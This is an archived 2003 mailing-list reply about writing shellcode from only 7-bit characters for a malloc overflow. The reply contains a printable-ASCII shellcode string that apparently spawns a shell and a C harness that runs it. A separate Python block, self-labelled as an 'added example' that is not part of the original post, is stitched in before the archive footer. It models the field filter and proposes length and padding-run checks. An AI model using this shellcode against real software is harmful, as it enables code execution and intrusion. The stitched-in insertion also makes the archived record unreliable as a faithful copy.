Re: shellcode with standard characters

From: steveat_private
Date: Thu Jun 12 2003 - 15:48:29 PDT

    On Thu, Jun 12, 2003 at 11:20:00AM +0200, JohnnyRun wrote:
    
    > This is my first post and I'm looking for some documentation.
    > A friend of mine has produced a segfault with malloc vulnerability on an
    > application.
    
    > We would like to produce something more interesting.
    > The field overflowed can accept only characters between 0 and 128. Any
    > other character is replaced with a whitespace.
    > 
    > Can we inject shellcode with only these characters available?
    > Can you suggest documentation on shellcode writing?
    
      The simplest thing to do is to write a simple program that will run
     a shell in C, and generate the assembly output for it with GCC -s.
     This will give you a starting point.
    
      After that you must filter out the opcodes and values which contain
     invalid characters.  Using adds, etc., will save you some effort.
    
      Here's a simple sample:
    
      char shellcode[] =
       "DDDDTYTX3H01H01h03h0LLLLLLLLXPY3E01E01u03u0j0fXh8eshXf5VJPfhbi"
       "fhDefXf5AJfPDTYhKATYX5KATYPQTUX3H01H01X03X0YRX3E01E03U0Jfh2GfX"
       "f3E0f1E0f1U0fh88fX0E1f1E0f3E0fPTRX49HHHQfPfYRX2E00E0BRX0E02E02"
       "L0z0L0zYRX4j4aGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
       "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
       "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
       "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG";
    
      int main()
      {
         int *ret;
         ret = (int *)&ret + 2;
         (*ret) = (int)shellcode;
    
         return 0;
      }
    
    Steve
    -- 
    Steve Kemp <steveat_private>
    Intasys Billing Technologies Ltd
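The thread's point from the defender's side, as an added example that is not part of the original post: the field filter described above (bytes above 127 become a space) is modelled below, and a constructed input with the same shape as the posted sample passes it untouched, so the character set is no protection; the length check and the repeated-byte run heuristic are hypothetical controls, and FIELD_SIZE is an assumed value.

```python
# Added example, not code from the original thread.
FIELD_SIZE = 32  # assumed size of the overflowed field (hypothetical)


def app_filter(data: bytes) -> bytes:
    """The filter the original poster describes: any byte >= 128 becomes a space."""
    return bytes(b if b < 128 else 0x20 for b in data)


def passes_unchanged(data: bytes) -> bool:
    """True when the filter does nothing to the input, i.e. it is pure 7-bit ASCII."""
    return app_filter(data) == data


def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte (a padding / sled heuristic)."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def accept_field(data: bytes, field_size: int = FIELD_SIZE) -> tuple:
    """Bounds check first: the overflow, not the character set, is the bug.

    The run-length heuristic is only a detection hint, never a substitute
    for the length check.
    """
    if len(data) > field_size:
        return False, f"rejected: {len(data)} bytes exceeds field of {field_size}"
    if longest_run(data) >= 16:
        return False, "rejected: suspicious padding run"
    return True, "ok"


# Constructed input: printable head followed by a long run of one byte,
# the same shape as the sample posted in the thread.
SAMPLE = b"DDDDTYTX3H01H01h03h0" + b"G" * 64
```

Running SAMPLE through app_filter returns it unchanged, while accept_field rejects it on length alone.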
    
    This archive was generated by hypermail 2b30 : Thu Jun 12 2003 - 18:20:35 PDT